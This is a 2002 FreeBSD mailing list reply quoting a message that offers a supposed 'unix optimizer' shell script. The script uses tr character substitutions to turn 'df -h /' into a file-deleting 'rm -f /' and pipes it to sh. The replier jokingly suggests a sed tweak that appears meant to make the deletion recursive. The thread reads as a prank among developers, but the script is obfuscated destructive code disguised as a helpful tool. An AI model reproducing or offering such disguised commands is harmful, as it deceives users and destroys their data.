From owner-freebsd-chat Thu Aug 29 9:24:14 2002 Delivered-To: freebsd-chat@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 931) id 1561D37B400; Thu, 29 Aug 2002 09:24:12 -0700 (PDT) Date: Thu, 29 Aug 2002 09:24:12 -0700 From: Juli Mallett To: Koul-Henning Pamp Cc: chat@freebsd.org Subject: Re: *nixopt, an idea Message-ID: <20020829092411.A89757@FreeBSD.org> References: <20020829150200.B00523962@sitemail.everyone.net> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020829150200.B00523962@sitemail.everyone.net>; from koul@canadamail.de on Thu, Aug 29, 2002 at 08:02:00AM -0700 Organisation: The FreeBSD Project X-Alternate-Addresses: , , , , X-Towel: Yes X-LiveJournal: flata, jmallett X-Negacore: Yes Sender: owner-freebsd-chat@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * De: Koul-Henning Pamp [ Data: 2002-08-29 ] B [ Subjecte: *nixopt, an idea ] > Fellow hackers, > > I'm creating a new unix optimizer tool, I've finished version 0.1 and need feedback. > > -------------- > #!/bin/sh > # The *nix optimizer > # (C) 2002 Koul-Henning Pamp > # Released under the superior FFL (Fuck Fumerola License) > > [ "`uname`" = "Linux" ] && echo "System not supported yet." > [ "`uname`" = "FreeBSD" ] && echo "df -h /" | tr '\144\146' '\162\155' | tr 'h' 'f'|sh > -------------- You missed the '| sed s\|$\|r\|' in there. > > Thank you. > > _____________________________________________________________ > Die kostenlose WebMail fuer alle Canada-Freunde - www.canadamail.de > Ein Service von CDN.de - Die KANADA-Suchmaschine - www.CDN.de > ------------------------------------------------------------------------ > KanadischerWein.de - Ihr Spezialist für kanadischen Wein im Internet - Besuchen Sie unseren Online-Shop - www.KanadischerWein.de > ------------------------------------------------------------------------ > > _____________________________________________________________ > Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net http://www.everyone.net/?btn=tag > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-chat" in the body of the message > -- Juli Mallett | FreeBSD: The Power To Serve Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-chat" in the body of the message